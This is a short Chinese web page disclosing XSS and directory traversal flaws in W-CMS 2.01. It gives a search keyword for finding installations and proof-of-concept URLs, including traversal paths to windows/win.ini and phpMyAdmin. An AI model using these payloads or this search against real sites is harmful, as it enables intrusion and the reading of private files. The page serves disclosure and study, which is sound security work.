安全基础知识

W-Cms XSS和遍历目录漏洞

官方网站:http://w-cms.info/
下载地址:http://code.google.com/p/wcms/
 

关键字: intext:”Powered by w-CMS”
版本:[2.01]
 

XSS漏洞

http://hellxman.blog.51cto.com/index.php?bid=1&COMMENT=1 “XSS”
http://hellxman.blog.51cto.com/?p=3″XSS
http://hellxman.blog.51cto.com/?bid=5&p=1″XSS
 
 
http://hellxman.blog.51cto.com/?p=3<FORM action=”Default.asp?PageId=-1″ method=POST id=searchFORMname=searchFORM style=”margin:0;padding:0″><INPUT type=”hidden” value=”” name=”txtSEARCH”></FORM>

目录遍历漏洞:

http://hellxman.blog.51cto.com/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://hellxman.blog.51cto.com/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php

 

全国客服电话: 400-001-7880
值班技术:
13330159245

                       

扫一扫,咨询客服